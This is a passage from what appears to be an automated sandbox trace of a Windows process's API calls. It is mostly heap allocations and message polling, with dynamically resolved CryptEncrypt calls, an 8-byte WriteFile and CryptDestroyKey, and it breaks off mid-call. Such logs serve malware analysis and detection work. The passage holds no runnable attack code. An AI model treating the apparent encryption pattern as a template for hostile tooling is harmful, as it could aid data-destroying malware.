1 [0157.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0157.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0157.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0157.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0157.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0157.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0157.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0157.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0157.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0157.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0157.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0157.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0157.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0157.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0157.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0157.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0157.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0157.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0157.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0157.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0157.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0157.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0157.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab88 | out: hHeap=0x2af0000) returned 1 [0157.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac18 | out: hHeap=0x2af0000) returned 1 [0157.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0157.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0157.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0157.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0157.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0157.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0157.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0157.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacd8 | out: hHeap=0x2af0000) returned 1 [0157.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac48 | out: hHeap=0x2af0000) returned 1 [0157.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0157.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0157.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0157.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0157.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad68 | out: hHeap=0x2af0000) returned 1 [0157.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaade0 | out: hHeap=0x2af0000) returned 1 [0157.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0157.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0157.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0157.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0157.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabb8 | out: hHeap=0x2af0000) returned 1 [0157.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0157.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0157.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaade0 | out: hHeap=0x2af0000) returned 1 [0157.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab88 | out: hHeap=0x2af0000) returned 1 [0157.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0157.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0157.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0157.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0157.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab70 | out: hHeap=0x2af0000) returned 1 [0157.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad38 | out: hHeap=0x2af0000) returned 1 [0157.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacd8 | out: hHeap=0x2af0000) returned 1 [0157.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0157.620] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0157.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab70 | out: hHeap=0x2af0000) returned 1 [0157.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0157.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabb8 | out: hHeap=0x2af0000) returned 1 [0157.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0157.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab70 | out: hHeap=0x2af0000) returned 1 [0157.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0157.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabd0 | out: hHeap=0x2af0000) returned 1 [0157.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0157.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0157.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0157.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacd8 | out: hHeap=0x2af0000) returned 1 [0157.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0157.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacd8 | out: hHeap=0x2af0000) returned 1 [0157.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0157.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab70 | out: hHeap=0x2af0000) returned 1 [0157.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0157.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab70 | out: hHeap=0x2af0000) returned 1 [0157.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0157.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab88 | out: hHeap=0x2af0000) returned 1 [0157.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0157.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac78 | out: hHeap=0x2af0000) returned 1 [0157.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab70 | out: hHeap=0x2af0000) returned 1 [0157.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0157.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0157.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0157.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0157.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0157.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab70 | out: hHeap=0x2af0000) returned 1 [0157.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0157.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab70 | out: hHeap=0x2af0000) returned 1 [0157.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0157.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad20 | out: hHeap=0x2af0000) returned 1 [0157.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0157.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0157.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaad20, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0157.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad20 | out: hHeap=0x2af0000) returned 1 [0157.625] GetProcAddress (hModule=0x76390000, lpProcName="CryptEncrypt") returned 0x763c2cf0 [0157.625] CryptEncrypt (in: hKey=0x9e1c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0157.625] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.625] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.625] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.625] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.625] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0157.625] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.626] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.626] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0157.626] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0157.626] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0157.626] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0157.626] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0157.626] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0157.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0157.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaaca8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0157.626] CryptEncrypt (in: hKey=0x9e1c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a719c8*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a719c8*, pdwDataLen=0x8cef60*=0x8) returned 1 [0157.626] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.626] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.626] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.626] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.626] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.626] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.626] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.627] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0157.627] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0157.627] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0157.627] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0157.627] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0157.627] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0157.627] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0157.627] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0157.627] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0157.627] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0157.627] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0157.627] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0157.627] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0157.627] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0157.627] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0157.627] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0157.627] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0157.627] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0157.627] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0157.627] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.627] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.627] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.627] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.634] WriteFile (in: hFile=0x4e0, lpBuffer=0x2a71868*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a71868*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0157.635] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.635] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.635] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0157.635] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0157.635] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0157.636] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0157.636] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0157.636] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0157.636] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0157.636] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0157.636] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0157.636] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0157.636] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0157.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0157.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaaa68, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0157.645] CryptDestroyKey (hKey=0x9e1c38) returned 1 [0157.645] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0157.645] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0157.646] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0157.646] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0157.646] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0157.646] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0157.646] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0157.646] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0157.646] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0157.646] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0157.646] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0157.646] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0157.646] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0157.646] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0157.646] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0157.646] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0157.646] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0157.646] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0157.646] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0157.646] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0157.646] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0157.646] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0157.646] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0157.646] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.646] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: 